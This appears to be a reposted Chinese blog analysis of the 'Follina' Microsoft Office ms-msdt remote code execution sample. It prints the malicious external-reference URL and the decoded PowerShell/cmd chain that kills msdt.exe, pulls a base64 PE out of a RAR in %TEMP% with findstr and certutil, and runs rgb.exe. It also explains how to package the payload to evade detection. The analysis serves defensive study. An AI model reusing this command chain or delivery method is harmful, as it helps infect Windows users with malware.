0x00 前言
开局一张图,昨天群友发的看起来非常厉害的一个Office 0day漏洞,即使不开启宏也可以通过ms-msdt
去执行powershell
代码,或是启动exe等等。
MSDT(Microsoft 诊断工具)
参考:https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt
0x01 分析
昨天拿到就简单看了一下,7z首先解压缩样本,发现word_relsdocument.xml.rels
下面有个奇怪的外部引用
https://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html
在沙箱确认这个就是恶意的白俄罗斯网站,所以打开查看源码:
可以大致看到是执行了powershell
,因为看到了Invoke-Expression
,里面是一层base64
,解开之后:
$cmd = "c:windowssystem32cmd.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
具体主要执行的如下:
c:windowssystem32cmd.exe /c cd C:userspublic&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe
大致做的事情就是:启动cmd隐藏窗口,结束msdt.exe
;然后循环查找%TEMP%
环境变量对应目录下面的名字为05-2022-0438.rar
的压缩包文件。
然后copy到C:userspublic
目录,使用findstr
在压缩包找到一串base64
编码,保存到文件随后用certutil
解码再使用expand
解压缩
最后执行解压出来的rgb.exe
这个PE文件。
0x02 原始样本利用方式
那么现在我们知道了,这个恶意文档是通过ms-msdt
去执行上述命令的,在当时看到这里,群友们都想的是那么这个05-2022-0438.rar
从哪里来呢?
他会从%TEMP%
去找05-2022-0438.rar
,也就是:
windows的一个小特性,打开的大多数文件在
%TEMP%
下都会有一份;比如打开一个压缩包,那么这个压缩包就会出现在
%TEMP%
下的某个随机命名的文件夹内
那么什么时候在%TEMP%
会出现05-2022-0438.rar
呢?
开始我们以为他是有什么黑科技,把05-2022-0438.rar
这个作为OLE之类的放入doc,后来经过测试发现正常添加OLE,这个文件也不会出现在%TEMP%
目录下。
然后推测其实这个原始样本在实际上攻击的时候应该是打了一个压缩包才可以让%TEMP%
出现这个压缩包,也就是:
压缩文件.rar -> 05-2022-0438.rar -> evil.doc
所以说其实这个样本是把PE打包后再base64
编码,放入到有恶意doc文件的压缩包的某些位置(测试把base64放到压缩包的尾部是不会影响正常解压缩的
),最后从压缩包打开恶意文档,然后去执行上述命令找到恶意PE执行。
0x03 总结
那么这个就是我推测的原始样本的利用方式,因为网上现在都是去测试弹calc,但是考虑到实战利用的话,肯定不可能弹一个calc就解决问题的,所以说推测学习一下原始样本的利用。
可能有些人会说,我用powershell
、certutil
等等等等去直接上线不好吗,但是考虑到通用性、免杀性,个人认为原始样本的利用方式还是更好些,还是比较巧妙的利用了windows打开压缩包会在%TEMP%
下生成对应的文件,接着使用漏洞的关键点ms-msdt
去执行上述的寻找最终PE的过程。
那么最后要注意的也有这个漏洞本身的价值以及通用性,我测试只成功了一次,所以没办法附上弹calc的装逼图了。
原文始发于微信公众号(黑客在思考):Follina - Microsoft Office 远程代码执行分析学习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论